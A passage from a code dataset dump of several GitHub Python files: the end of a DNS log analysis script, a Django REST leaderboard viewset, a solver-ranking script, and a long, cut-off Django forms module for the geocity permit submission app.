json.load(f)\n weirdInCollect = Counter()\n for key in dataDict:\n if dataDict[key][\"weird\"]:\n # Check direction first to get the inner server.\n srcIP = dataDict[key][\"addr\"][0]\n dstIP = dataDict[key][\"addr\"][2]\n for _ in dataDict[key][\"weird\"]:\n if srcIP.startswith(\"136.159.\"):\n # Which means srcIP is within our campus. it should be an outbound traffic\n weirdInCollect[getIPCluster(srcIP)] += 1\n else:\n weirdInCollect[getIPCluster(dstIP)] += 1\n\n return Counter(dict(weirdInCollect.most_common(topK)))\n","repo_name":"aquablue1/dns_comb","sub_path":"src/integUtil/worker2D1WeirdInG.py","file_name":"worker2D1WeirdInG.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40257989284","text":"from django.utils.decorators import method_decorator\nfrom django.views.decorators.cache import cache_page\nfrom django_filters import rest_framework\nfrom rest_framework.exceptions import NotFound\nfrom rest_framework.mixins import ListModelMixin, RetrieveModelMixin\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom common.api.serializers import LeaderBoardSerializer\nfrom common.models import LeaderBoard\n\n\nclass LeaderBoardFilterBackend(rest_framework.DjangoFilterBackend):\n allowed_lookups = [\n 'rate_place',\n 'rate_place__gt',\n 'rate_place__gte',\n 'rate_place__lt',\n 'rate_place__lte',\n 'user_id',\n ]\n\n def filter_queryset(self, request, queryset, view):\n filter_args = request.query_params\n allowed_filter_args = {allowed_key: filter_args[allowed_key] for allowed_key in self.allowed_lookups if\n allowed_key in filter_args.keys()}\n return queryset.filter(**allowed_filter_args)\n\n\nclass LeaderBoardViewSet(ListModelMixin, RetrieveModelMixin, GenericViewSet):\n serializer_class = LeaderBoardSerializer\n queryset = LeaderBoard.objects.order_by('-rating', 'datetime')\n filter_backends = (LeaderBoardFilterBackend,)\n\n @method_decorator(cache_page(60)) # 1 min\n def retrieve(self, request, *args, **kwargs):\n rate_place = kwargs.get('pk')\n if not rate_place:\n raise NotFound\n try:\n rate_place = int(rate_place)\n except:\n raise NotFound\n qs_params = {\n 'rate_place__gte': rate_place - 1,\n 'rate_place__lte': rate_place + 1\n }\n self.queryset = self.queryset.filter(**qs_params)\n return self.list(request, *args, **kwargs)\n\n @method_decorator(cache_page(60)) # 1 min\n def list(self, request, *args, **kwargs):\n return super(LeaderBoardViewSet, self).list(request, *args, **kwargs)\n","repo_name":"xtimonx5/rating_test","sub_path":"rating/common/api/viewsets/rate_record.py","file_name":"rate_record.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17899822779","text":"from rank import rank \n\nrankings = {}\nm = {0: {}, -1: {}}\nscore = {}\n\nlargura = 0\n\nfor inst in set(rank):\n\tfor col in set(rank[inst]):\n\t\tfor tl in set(rank[inst][col]):\n\t\t\t\n\t\t\tif not len(rank[inst][col][tl]):\n\t\t\t\tcontinue \n\t\t\tr = n = []\n\t\t\tk = None\n\t\t\trank[inst][col][tl].sort()\n\t\t\tfor d, sol in rank[inst][col][tl]:\n\t\t\t\tif d == k:\n\t\t\t\t\tn.append(sol)\n\t\t\t\telse:\t\n\t\t\t\t\tn = [sol]\n\t\t\t\t\tr.append(n)\n\t\t\t\tk = d\t\n\t\t\tfor n in r:\n\t\t\t\tn.sort()\t\n\t\t\tr = tuple(tuple(n) for n in r)\t\n\t\t\tif not r in rankings:\n\t\t\t\tprint(col, tl, inst, '\\t', *r)\n\t\t\t\trankings[r] = {}\n\t\t\trankings[r][col, tl, inst] = rank[inst][col][tl]\n\nfor r in rankings:\t\t\t\n\tprint('\\n', *r)\n\trk = list(rankings[r])\n\trk.sort()\n\tfor k in rk:\n\t\tprint(*k, sep='\\t')\t\n\t\t\n\tfor i in m:\t\n\t\tif len(r) != 1:\t\n\t\t\tfor s in r[i]:\n\t\t\t\tif not s in m[i]:\n\t\t\t\t\tm[i][s] = {}\n\t\t\t\tm[i][s].update({(k[-1].split('.')[-1],) + k + ((len(r[i]),) * ((len(r[i]) > 1))): rankings[r][k] for k in rankings[r]})\t\t\t\t\t\n\nfor i in m:\n\tprint('\\n\\n',i)\n\tfor sol in m[i]:\n\t\tif not sol in score:\n\t\t\tscore[sol] = {}\n\t\tscore[sol][i] = {}\n\n\t\tfor k in m[i][sol]:\n\t\t\tl = len(str(k)) + len(k)\n\t\t\tif l > largura:\n\t\t\t\tlargura = l\n\t\tprint('\\n\\t',sol)\n\t\trk = list(m[i][sol])\n\t\trk.sort()\n\t\tfor k in rk:\n\t\t\tprint(*k, ' '*(largura - len(str(k))), '\\t', m[i][sol][k])\t\n\t\t\tif not k[:2] in score[sol][i]:\n\t\t\t\tscore[sol][i][k[:2]] = {}\n\t\t\tscore[sol][i][k[:2]][k[2:]] = m[i][sol][k] \t\n\t\t\t\nfor sol in score:\n\tfor i in score[sol]:\n\t\tprint()\n\t\tprint(i,'\\t',sol)\n\t\tcolunas = list(score[sol][i])\n\t\tcolunas.sort()\n\t\tfor col in colunas:\n\t\t\tcategorias = {}\n\t\t\tprint(*col,'\\t',len(score[sol][i][col]))\n\t\t\tfor k in score[sol][i][col]:\n\t\t\t\tfor c in range(len(k)):\n\t\t\t\t\tt = k[c]\n\t\t\t\t\twhile type(t) == tuple and len(t) > 0:\n\t\t\t\t\t\tt = t[0]\t\n\t\t\t\t\tif not (c, t) in categorias:\n\t\t\t\t\t\tcategorias[c, t] = 0\n\t\t\t\t\tcategorias[c, t] += 1\n\t\t\tcat = list(categorias)\t\t\n\t\t\tcat.sort()\n\t\t\tfor c, k in cat:\t\t\t\n\t\t\t\tprint(' ',k,'\\t', categorias[c, k])\n\t\t\t\tpass \n","repo_name":"AkiraDemenech/MIP_Solvers","sub_path":"cflp.rank.py","file_name":"cflp.rank.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20588905650","text":"import io\nimport mimetypes\nimport string\nfrom collections import defaultdict\nfrom datetime import datetime, timedelta\nfrom itertools import groupby\n\nfrom bootstrap_datepicker_plus.widgets import DatePickerInput, DateTimePickerInput\nfrom captcha.fields import CaptchaField\nfrom constance import config\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import HTML, Field, Fieldset, Layout\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib.auth.models import Permission\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.gis import forms as geoforms\nfrom django.core.exceptions import ValidationError\nfrom django.core.files import File\nfrom django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator\nfrom django.db import transaction\nfrom django.db.models import Max, Q\nfrom django.forms import modelformset_factory\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.utils.safestring import mark_safe\nfrom django.utils.text import slugify\nfrom django.utils.translation import gettext_lazy as _\nfrom django_select2.forms import Select2MultipleWidget, Select2Widget\n\nfrom geocity.apps.accounts.models import (\n PUBLIC_TYPE_CHOICES,\n AdministrativeEntity,\n PermitDepartment,\n)\nfrom geocity.fields import AddressWidget, GeometryWidgetAdvanced\n\nfrom ..forms.models import Price\nfrom ..reports.services import generate_report_pdf_as_response\nfrom . import models, permissions, services\nfrom .payments.models import SubmissionPrice\n\ninput_type_mapping = {\n models.Field.INPUT_TYPE_TEXT: forms.CharField,\n models.Field.INPUT_TYPE_CHECKBOX: forms.BooleanField,\n models.Field.INPUT_TYPE_NUMBER: forms.FloatField,\n models.Field.INPUT_TYPE_FILE: forms.FileField,\n models.Field.INPUT_TYPE_ADDRESS: forms.CharField,\n models.Field.INPUT_TYPE_DATE: forms.DateField,\n models.Field.INPUT_TYPE_LIST_SINGLE: forms.ChoiceField,\n models.Field.INPUT_TYPE_LIST_MULTIPLE: forms.MultipleChoiceField,\n models.Field.INPUT_TYPE_REGEX: forms.CharField,\n}\n\n\ndef get_regex_error_message(field):\n return (\n (\n _(\"La saisie n'est pas conforme au format demandé (%(placeholder)s).\")\n % {\"placeholder\": field.placeholder}\n )\n if field.placeholder\n else _(\"La saisie n'est pas conforme au format demandé.\")\n )\n\n\ndef _title_html_representation(prop, for_summary=False):\n base = f\"
{prop.name}
\"\n if not for_summary and prop.help_text:\n base = f\"{base}{prop.help_text}\"\n return base\n\n\ndef _text_html_representation(prop, for_summary=False):\n base = f\"

{prop.name}

\"\n if not for_summary and prop.help_text:\n base = f\"{base}{prop.help_text}\"\n return base\n\n\ndef _file_download_html_representation(prop, for_summary=False):\n if not for_summary and prop.file_download:\n description = prop.help_text if prop.help_text else _(\"Télécharger le fichier\")\n return f\"\"\"{prop.name}:\n \n {description}\"\"\"\n return \"\"\n\n\nnon_value_input_type_mapping = {\n models.Field.DISPLAY_TITLE: _title_html_representation,\n models.Field.DISPLAY_TEXT: _text_html_representation,\n models.Field.INPUT_TYPE_FILE_DOWNLOAD: _file_download_html_representation,\n}\n\n\ndef get_field_cls_for_field(field):\n try:\n return input_type_mapping[field.input_type]\n except KeyError as e:\n raise KeyError(f\"Field of type {e} is not supported.\")\n\n\ndef regroup_by_ofs_id(entities):\n return groupby(entities.order_by(\"ofs_id\", \"name\"), lambda entity: entity.ofs_id)\n\n\ndef disable_form(form, editable_fields=None):\n for field in form.fields.values():\n if editable_fields and field.label in editable_fields:\n continue\n field.disabled = True\n\n if not editable_fields:\n form.disabled = True\n\n\nclass DisabledChoicesMixin:\n @property\n def disabled_choices(self):\n return getattr(self, \"_disabled_choices\", [])\n\n @disabled_choices.setter\n def disabled_choices(self, other):\n self._disabled_choices = other\n\n def create_option(\n self, name, value, label, selected, index, subindex=None, attrs=None\n ):\n option = super().create_option(\n name, value, label, selected, index, subindex, attrs\n )\n if value in self.disabled_choices:\n option[\"attrs\"][\"disabled\"] = \"disabled\"\n return option\n\n\nclass GroupedRadioWidget(forms.RadioSelect):\n template_name = \"submissions/widgets/groupedradio.html\"\n\n class Media:\n css = {\"all\": (\"customWidgets/GroupedRadio/groupedradio.css\",)}\n\n\nclass CheckboxSelectMultipleWidget(DisabledChoicesMixin, forms.CheckboxSelectMultiple):\n template_name = \"submissions/widgets/multipleselect.html\"\n option_template_name = \"submissions/widgets/checkbox_option.html\"\n\n\nclass SingleFormRadioSelectWidget(DisabledChoicesMixin, forms.RadioSelect):\n template_name = \"submissions/widgets/categorized_groupedradio.html\"\n\n\nclass AdministrativeEntityForm(forms.Form):\n administrative_entity = forms.ModelChoiceField(\n label=_(\"Entité administrative\"),\n widget=GroupedRadioWidget(),\n queryset=AdministrativeEntity.objects.all(),\n )\n\n def __init__(self, *args, **kwargs):\n self.instance = kwargs.pop(\"instance\", None)\n self.user = kwargs.pop(\"user\", None)\n administrative_entities = kwargs.pop(\"administrative_entities\")\n\n if self.instance:\n initial = {\n **kwargs.get(\"initial\", {}),\n \"administrative_entity\": self.instance.administrative_entity.pk,\n }\n else:\n initial = {}\n\n kwargs[\"initial\"] = initial\n\n super().__init__(*args, **kwargs)\n\n self.fields[\"administrative_entity\"].choices = [\n (ofs_id, [(entity.pk, entity.name) for entity in entities])\n for ofs_id, entities in regroup_by_ofs_id(administrative_entities)\n ]\n\n def save(self, author):\n administrative_entity_instance = AdministrativeEntity.objects.get(\n pk=self.cleaned_data[\"administrative_entity\"].pk\n )\n\n if not self.instance:\n return models.Submission.objects.create(\n administrative_entity=administrative_entity_instance,\n author=author,\n )\n else:\n self.instance.set_administrative_entity(administrative_entity_instance)\n return self.instance\n\n\nclass FormChoiceField(forms.ModelMultipleChoiceField):\n def label_from_instance(self, obj):\n return obj.name\n\n\nclass FormsSelectForm(forms.Form):\n prefix = \"forms\"\n selected_forms = forms.MultipleChoiceField(widget=CheckboxSelectMultipleWidget())\n\n def __init__(self, instance, form_categories=None, *args, **kwargs):\n self.instance = instance\n self.user = kwargs.pop(\"user\", None)\n form_categories = form_categories or []\n selected_forms = list(\n self.instance.selected_forms.values_list(\"form_id\", flat=True)\n )\n\n initial = {\"selected_forms\": selected_forms}\n\n super().__init__(*args, **{**kwargs, \"initial\": initial})\n user_can_view_private_form = self.user.has_perm(\"submissions.view_private_form\")\n\n forms_filter = Q()\n\n if form_categories:\n forms_filter &= Q(category__in=form_categories)\n\n integrator_admin = self.user.groups.filter(\n permit_department__is_integrator_admin=True\n ).first()\n\n user_administrative_entities = AdministrativeEntity.objects.associated_to_user(\n self.user\n )\n\n if not self.user.is_superuser:\n if integrator_admin:\n \"\"\"An integrator can fill all forms he owns + public ones\"\"\"\n forms_filter &= Q(integrator=integrator_admin) | Q(is_public=True)\n elif user_administrative_entities and user_can_view_private_form:\n \"\"\"User is trusted and associated to administrative entities,\n he can fill private forms for those administrative entities\n if granted permission 'view_private_form'\"\"\"\n forms_filter &= Q(\n administrative_entities__in=user_administrative_entities\n ) | Q(is_public=True)\n elif not user_can_view_private_form or not user_administrative_entities:\n \"\"\"Untrusted users or user not granted with view_private_form can only fill public forms\"\"\"\n forms_filter &= Q(is_public=True)\n\n forms = (\n models.Form.objects.filter(\n Q(\n forms_filter,\n administrative_entities=self.instance.administrative_entity,\n is_anonymous=self.user.userprofile.is_temporary,\n )\n | Q(pk__in=selected_forms)\n )\n .distinct()\n .select_related(\"category\")\n .order_by(\"order\")\n )\n\n forms_by_category_dict = {}\n for form in forms:\n forms_by_category_dict.setdefault(form.category, []).append(form)\n\n forms_by_category = []\n disabled_choices = set()\n for category, forms in sorted(\n forms_by_category_dict.items(), key=lambda item: slugify(item[0].name)\n ):\n forms_list = []\n for form in forms:\n form_name = form.name\n if form.has_exceeded_maximum_submissions():\n form_name = f\"{form_name} {form.max_submissions_message}\"\n disabled_choices.add(form.pk)\n forms_list.append((form.pk, form_name))\n\n forms_by_category.append((category, forms_list))\n\n self.fields[\"selected_forms\"].choices = forms_by_category\n self.fields[\"selected_forms\"].widget.disabled_choices = disabled_choices\n self.initial[\"selected_forms\"] = [\n e for e in self.initial[\"selected_forms\"] if e not in disabled_choices\n ]\n\n def clean_selected_forms(self):\n selected_forms = models.Form.objects.filter(\n pk__in=self.cleaned_data[\"selected_forms\"]\n )\n if any([form.has_exceeded_maximum_submissions() for form in selected_forms]):\n raise forms.ValidationError(selected_forms.first().max_submissions_message)\n return self.cleaned_data[\"selected_forms\"]\n\n @transaction.atomic\n def save(self):\n selected_forms = models.Form.objects.filter(\n pk__in=self.cleaned_data[\"selected_forms\"]\n )\n self.instance.set_selected_forms(selected_forms)\n\n return self.instance\n\n @transaction.atomic\n def save(self):\n selected_forms = models.Form.objects.filter(\n pk__in=self.cleaned_data[\"selected_forms\"]\n )\n self.instance.set_selected_forms(selected_forms)\n\n return self.instance\n\n @transaction.atomic\n def save(self):\n selected_forms = models.Form.objects.filter(\n pk__in=self.cleaned_data[\"selected_forms\"]\n )\n self.instance.set_selected_forms(selected_forms)\n\n return self.instance\n\n\nclass FormsSingleSelectForm(FormsSelectForm):\n selected_forms = forms.ChoiceField(widget=SingleFormRadioSelectWidget())\n\n def clean_selected_forms(self):\n selected_form = models.Form.objects.get(pk=self.cleaned_data[\"selected_forms\"])\n if selected_form.has_exceeded_maximum_submissions():\n raise forms.ValidationError(selected_form.max_submissions_message)\n return self.cleaned_data[\"selected_forms\"]\n\n @transaction.atomic\n def save(self):\n selected_form = models.Form.objects.get(pk=self.cleaned_data[\"selected_forms\"])\n self.instance.set_selected_forms([selected_form])\n return self.instance\n\n\nclass FormsPriceSelectForm(forms.Form):\n\n selected_price = forms.ChoiceField(\n label=False, widget=SingleFormRadioSelectWidget(), required=True\n )\n\n def __init__(self, instance, *args, **kwargs):\n self.instance = instance\n initial = {}\n if self.instance.submission_price is not None:\n initial = {\n \"selected_price\": self.instance.submission_price.original_price.pk\n }\n super(FormsPriceSelectForm, self).__init__(\n *args, **{**kwargs, \"initial\": initial}\n )\n if self.instance.status != self.instance.STATUS_DRAFT:\n self.fields[\"selected_price\"].widget.attrs[\"disabled\"] = \"disabled\"\n form_for_payment = self.instance.get_form_for_payment()\n\n choices = []\n for price in form_for_payment.prices.order_by(\"formprice\"):\n choices.append((price.pk, price.str_for_choice()))\n self.fields[\"selected_price\"].choices = choices\n\n @transaction.atomic\n def save(self):\n selected_price_id = self.cleaned_data[\"selected_price\"]\n selected_price = Price.objects.get(pk=selected_price_id)\n price_data = {\n \"amount\": selected_price.amount,\n \"currency\": selected_price.currency,\n \"text\": selected_price.text,\n }\n current_submission_price = self.instance.get_submission_price()\n if current_submission_price is None:\n SubmissionPrice.objects.create(\n **{\n **price_data,\n \"original_price\": selected_price,\n \"submission\": self.instance,\n }\n )\n else:\n current_submission_price.amount = price_data[\"amount\"]\n current_submission_price.text = price_data[\"text\"]\n current_submission_price.currency = price_data[\"currency\"]\n current_submission_price.original_price = selected_price\n current_submission_price.save()\n\n return self.instance\n\n\nclass PartialValidationMixin:\n def __init__(self, *args, **kwargs):\n # Set to `False` to disable required fields validation (useful to allow saving incomplete forms)\n self.enable_required = kwargs.pop(\"enable_required\", True)\n super().__init__(*args, **kwargs)\n\n\nclass FieldsForm(PartialValidationMixin, forms.Form):\n prefix = \"fields\"\n required_css_class = \"required\"\n\n def __init__(self, instance, *args, **kwargs):\n self.instance = instance\n disable_fields = kwargs.pop(\"disable_fields\", False)\n\n # Compute initial values for fields\n initial = {}\n prop_values = self.get_values()\n for prop_value in prop_values:\n initial[\n self.get_field_name(\n prop_value.selected_form.form,\n prop_value.field,\n )\n ] = prop_value.get_value()\n\n kwargs[\"initial\"] = {**initial, **kwargs.get(\"initial\", {})}\n\n super().__init__(*args, **kwargs)\n\n fields_per_form = defaultdict(list)\n payment_forms = set()\n\n # Create fields\n for form, field in self.get_fields():\n field_name = self.get_field_name(form, field)\n form_name = form.shortname if form.shortname else str(form)\n if form.requires_online_payment:\n payment_forms.add(form_name)\n if field.is_value_field():\n fields_per_form[form_name].append(\n Field(field_name, title=field.help_text)\n )\n self.fields[field_name] = self.form_field_for_field(field)\n if field.is_mandatory:\n self.fields[field_name].required = True\n else:\n fields_per_form[form_name].append(self.non_field_value_for_field(field))\n\n if disable_fields:\n for field in self.fields.values():\n field.disabled = True\n\n fieldsets = []\n for form_str, fieldset_fields in fields_per_form.items():\n if form_str in payment_forms:\n form_str = \"\"\n fieldset_fields = [form_str] + fieldset_fields\n fieldsets.append(Fieldset(*fieldset_fields))\n\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.layout = Layout(*fieldsets)\n\n def get_field_representation(self, form, field):\n if field.is_value_field():\n return self[self.get_field_name(form, field)]\n else:\n return {\n \"repr\": non_value_input_type_mapping.get(field.input_type, {})(\n field, True\n )\n }\n\n def get_form_fields_by_form(self):\n \"\"\"\n Return a list of tuples `(Form, List[Field])` for each object type and their properties.\n \"\"\"\n\n return [\n (\n object_type,\n [self.get_field_representation(object_type, prop) for prop in props],\n )\n for object_type, props in self.get_fields_by_form()\n ]\n\n def get_fields_by_form(self):\n \"\"\"\n Return a list of tuples `(Form, List[Field])` for the forms selected in the\n current submission.\n \"\"\"\n return self.instance.get_fields_by_form()\n\n def get_fields(self):\n \"\"\"\n Return a list of tuples `(Form, Field)` for the current submission. They're\n used to create the form fields.\n \"\"\"\n for form, fields in self.instance.get_fields_by_form():\n for field in fields:\n yield (form, field)\n\n def get_values(self):\n \"\"\"\n Return `FieldValue` objects for the current submission. They're used to set the initial\n value of the form fields.\n \"\"\"\n return self.instance.get_fields_values()\n\n def get_field_name(self, form, field):\n return \"{}_{}\".format(form.pk, field.pk)\n\n def form_field_for_field(self, field):\n \"\"\"\n Return a Field instance for the given property. The specific class of the field is defined by\n `get_field_cls_for_field`.\n \"\"\"\n field_class = get_field_cls_for_field(field)\n field_instance = field_class(**self.get_field_kwargs(field))\n\n return field_instance\n\n def non_field_value_for_field(self, field):\n try:\n input_func = non_value_input_type_mapping[field.input_type]\n return HTML(f\"
{input_func(field)}
\")\n except KeyError as e:\n raise KeyError(f\"Field of type {e} is not supported.\")\n\n def get_field_kwargs(self, prop):\n \"\"\"\n Return the options used when instantiating the field for the given `prop`.\n \"\"\"\n default_kwargs = {\n \"required\": self.enable_required and prop.is_mandatory,\n \"label\": prop.name,\n \"help_text\": prop.help_text if prop.help_text != \"\" else \"\",\n }\n\n extra_kwargs = {\n models.Field.INPUT_TYPE_TEXT: self.get_text_field_kwargs,\n models.Field.INPUT_TYPE_ADDRESS: self.get_address_field_kwargs,\n models.Field.INPUT_TYPE_DATE: self.get_date_field_kwargs,\n models.Field.INPUT_TYPE_NUMBER: self.get_number_field_kwargs,\n models.Field.INPUT_TYPE_FILE: self.get_file_field_kwargs,\n models.Field.INPUT_TYPE_REGEX: self.get_regex_field_kwargs,\n models.Field.INPUT_TYPE_LIST_SINGLE: self.get_list_single_field_kwargs,\n models.Field.INPUT_TYPE_LIST_MULTIPLE: self.get_list_multiple_field_kwargs,\n }\n\n try:\n return extra_kwargs[prop.input_type](prop, default_kwargs)\n except KeyError:\n return default_kwargs\n\n def get_text_field_kwargs(self, field, default_kwargs):\n return {\n **default_kwargs,\n \"widget\": forms.Textarea(\n attrs={\n \"rows\": field.line_number_for_textarea,\n \"placeholder\": (\"ex: \" + field.placeholder)\n if field.placeholder != \"\"\n else \"\",\n },\n ),\n }\n\n def get_regex_field_kwargs(self, field, default_kwargs):\n\n return {\n **default_kwargs,\n \"widget\": forms.Textarea(\n attrs={\n \"rows\": 1,\n \"placeholder\": (\"ex: \" + field.placeholder)\n if field.placeholder != \"\"\n else \"\",\n },\n ),\n \"validators\": [\n RegexValidator(\n regex=field.regex_pattern,\n message=get_regex_error_message(field),\n )\n ],\n }\n\n def get_address_field_kwargs(self, field, default_kwargs):\n return {\n **default_kwargs,\n \"widget\": AddressWidget(\n autocomplete_options={\n \"single_address_field\": True,\n },\n attrs={\n \"placeholder\": (\"ex: \" + field.placeholder)\n if field.placeholder != \"\"\n else \"\",\n \"additional_searchtext_for_address_field\": field.additional_searchtext_for_address_field\n if field.additional_searchtext_for_address_field\n else \"\",\n },\n ),\n }\n\n def get_date_field_kwargs(self, field, default_kwargs):\n return {\n **default_kwargs,\n \"input_formats\": [settings.DATE_INPUT_FORMAT],\n \"widget\": DatePickerInput(\n options={\n \"format\": \"DD.MM.YYYY\",\n \"locale\": \"fr-CH\",\n \"useCurrent\": False,\n \"minDate\": \"1900/01/01\",\n \"maxDate\": \"2100/12/31\",\n },\n attrs={\n \"placeholder\": (\"ex: \" + field.placeholder)\n if field.placeholder != \"\"\n else \"\"\n },\n ),\n }\n\n def get_number_field_kwargs(self, field, default_kwargs):\n return {\n **default_kwargs,\n \"widget\": forms.NumberInput(\n attrs={\n \"placeholder\": (\"ex: \" + field.placeholder)\n if field.placeholder != \"\"\n else \"\"\n },\n ),\n }\n\n def get_file_field_kwargs(self, field, default_kwargs):\n file_size_mb = int(config.MAX_FILE_UPLOAD_SIZE / 1048576)\n default_help_text = f\"Le fichier doit faire moins de {str(file_size_mb)} Mo\"\n dynamic_help_text = \"\"\n global_allowed_file_extensions_list = (\n config.ALLOWED_FILE_EXTENSIONS.translate(\n str.maketrans(\"\", \"\", string.whitespace)\n )\n .lower()\n .split(\",\")\n )\n field_allowed_file_extensions_list = (\n field.allowed_file_types.translate(str.maketrans(\"\", \"\", string.whitespace))\n .lower()\n .split(\",\")\n )\n if field.allowed_file_types:\n extensions_intersect = list(\n set(global_allowed_file_extensions_list).intersection(\n set(field_allowed_file_extensions_list)\n )\n )\n dynamic_help_text = (\n f\"{default_help_text}, format(s): {field.allowed_file_types}\"\n )\n else:\n extensions_intersect = global_allowed_file_extensions_list\n dynamic_help_text = (\n f\"{default_help_text}, format(s): {config.ALLOWED_FILE_EXTENSIONS}\"\n )\n\n allowed_mimetypes_str = \", \".join(\n [mimetypes.types_map[f\".{item}\"] for item in extensions_intersect]\n )\n\n return {\n **default_kwargs,\n \"validators\": [services.validate_file],\n \"help_text\": dynamic_help_text,\n \"widget\": forms.ClearableFileInput(attrs={\"accept\": allowed_mimetypes_str}),\n }\n\n def get_list_single_field_kwargs(self, field, default_kwargs):\n choices = [(\"\", \"\")] + [(value, value) for value in field.choices.splitlines()]\n\n return {\n **default_kwargs,\n \"choices\": choices,\n \"widget\": Select2Widget() if len(choices) > 5 else forms.Select(),\n }\n\n def get_list_multiple_field_kwargs(self, field, default_kwargs):\n return {\n **default_kwargs,\n \"choices\": [(value, value) for value in field.choices.splitlines()],\n \"widget\": Select2MultipleWidget()\n if len(field.choices) > 5\n else forms.CheckboxSelectMultiple(),\n }\n\n def save(self):\n to_geocode_addresses = []\n for form, field in self.get_fields():\n if field.is_value_field():\n self.instance.set_field_value(\n form=form,\n field=field,\n value=self.cleaned_data[self.get_field_name(form, field)],\n )\n if (\n field.input_type == models.Field.INPUT_TYPE_ADDRESS\n and field.store_geometry_for_address_field\n and self.cleaned_data[self.get_field_name(form, field)]\n ):\n to_geocode_addresses.append(\n self.cleaned_data[self.get_field_name(form, field)]\n )\n self.instance.reverse_geocode_and_store_address_geometry(to_geocode_addresses)\n\n\nclass AppendicesForm(FieldsForm):\n prefix = \"appendices\"\n\n def get_fields_by_form(self):\n return self.instance.get_appendices_fields_by_form()\n\n def get_fields(self):\n for form, fields in self.instance.get_appendices_fields_by_form():\n for field in fields:\n yield (form, field)\n\n def get_values(self):\n return self.instance.get_appendices_values()\n\n def get_field_kwargs(self, prop):\n return {\n **super().get_field_kwargs(prop),\n }\n\n\nclass SubmissionCreditorForm(forms.ModelForm):\n class Meta:\n model = models.Submission\n fields = [\"creditor_type\"]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n required_contact_forms = set(\n models.ContactForm.objects.filter(\n form_category__in=self.instance.get_form_categories()\n ).values_list(\"type\", flat=True)\n )\n\n choices = [\n (creditor_type, label)\n for creditor_type, label in self.fields[\"creditor_type\"].choices\n if creditor_type in required_contact_forms\n ]\n choices.insert(0, (\"\", \"----\"))\n self.fields[\"creditor_type\"].choices = choices\n\n\nclass SubmissionContactForm(forms.ModelForm):\n required_css_class = \"required\"\n contact_fields = [\n \"first_name\",\n \"last_name\",\n \"company_name\",\n \"vat_number\",\n \"address\",\n \"address\",\n \"city\",\n \"phone\",\n \"zipcode\",\n \"email\",\n ]\n\n first_name = forms.CharField(\n max_length=150,\n label=_(\"Prénom\"),\n widget=forms.TextInput(\n attrs={\n \"placeholder\": \"ex: Marcel\",\n }\n ),\n )\n last_name = forms.CharField(\n max_length=100,\n label=_(\"Nom\"),\n widget=forms.TextInput(\n attrs={\n \"placeholder\": \"ex: Dupond\",\n }\n ),\n )\n phone = forms.CharField(\n min_length=10,\n max_length=16,\n label=_(\"Téléphone\"),\n widget=forms.TextInput(\n attrs={\n \"placeholder\": \"ex: 024 111 22 22\",\n }\n ),\n validators=[\n RegexValidator(\n regex=r\"^(((\\+41)\\s?)|(0))?(\\d{2})\\s?(\\d{3})\\s?(\\d{2})\\s?(\\d{2})$\",\n message=mark_safe(\n 'Veuillez saisir un numéro de téléphone suisse valide.'\n ),\n )\n ],\n )\n email = forms.EmailField(\n max_length=100,\n label=_(\"Email\"),\n widget=forms.TextInput(\n attrs={\n \"placeholder\": \"ex: exemple@exemple.com\",\n }\n ),\n )\n address = forms.CharField(\n max_length=100,\n label=_(\"Adresse\"),\n widget=AddressWidget(\n autocomplete_options={\n \"single_address_field\": False,\n \"single_contact\": False,\n },\n ),\n )\n\n zipcode = forms.IntegerField(\n label=_(\"NPA\"),\n validators=[MinValueValidator(1000), MaxValueValidator(9999)],\n widget=forms.NumberInput(),\n )\n city = forms.CharField(\n max_length=100,\n label=_(\"Ville\"),\n widget=forms.TextInput(\n attrs={\n \"placeholder\": \"ex: Yverdon\",\n }\n ),\n )\n company_name = forms.CharField(\n required=False,\n label=_(\"Raison sociale\"),\n max_length=100,\n widget=forms.TextInput(attrs={\"placeholder\": \"ex: Construction SA\"}),\n )\n vat_number = forms.CharField(\n required=False,\n label=_(\"Numéro TVA\"),\n max_length=19,\n validators=[\n RegexValidator(\n regex=r\"^(CHE-)\\d{3}\\.\\d{3}\\.\\d{3}(\\sTVA)?$\",\n message=\"Le code d'entreprise doit être de type \\\n CHE-123.456.789 (TVA) \\\n et vous pouvez le trouver sur \\\n le registre fédéral des entreprises \\\n https://www.uid.admin.ch/search.aspx\",\n )\n ],\n widget=forms.TextInput(attrs={\"placeholder\": \"ex: CHE-123.456.789 (TVA)\"}),\n )\n contact_form = forms.ModelChoiceField(\n queryset=models.ContactType.objects.all(),\n empty_label=\"Sélectionner un contact...\",\n label=_(\"Type de contact\"),\n )\n\n class Meta:\n model = models.SubmissionContact\n fields = [\"contact_form\"]\n\n def __init__(self, *args, **kwargs):\n instance = kwargs.get(\"instance\")\n\n if instance and instance.pk:\n kwargs[\"initial\"] = {\n **kwargs.get(\"initial\", {}),\n **{\n **kwargs.get(\"initial\", {}),\n **{\n field: getattr(instance.contact, field)\n for field in self.contact_fields\n },\n **{\"actor_form\": instance.contact_form},\n },\n }\n\n super().__init__(*args, **kwargs)\n\n @transaction.atomic\n def save(self, submission, commit=True):\n contact = self.instance.contact if self.instance.pk else None\n\n if not contact:\n contact = models.Contact.objects.create(\n **{field: self.cleaned_data.get(field) for field in self.contact_fields}\n )\n else:\n for field in self.contact_fields:\n setattr(contact, field, self.cleaned_data.get(field))\n contact.save()\n\n instance = super().save(commit=False)\n instance.contact = contact\n instance.submission = submission\n instance.save()\n\n return instance\n\n\nclass SubmissionAdditionalInformationForm(forms.ModelForm):\n required_css_class = \"required\"\n\n notify_author = forms.BooleanField(\n label=_(\"Notifier l'auteur de la demande\"),\n required=False,\n )\n reason = forms.CharField(\n label=_(\"Raison\"),\n widget=forms.Textarea(attrs={\"rows\": 1}),\n required=False,\n 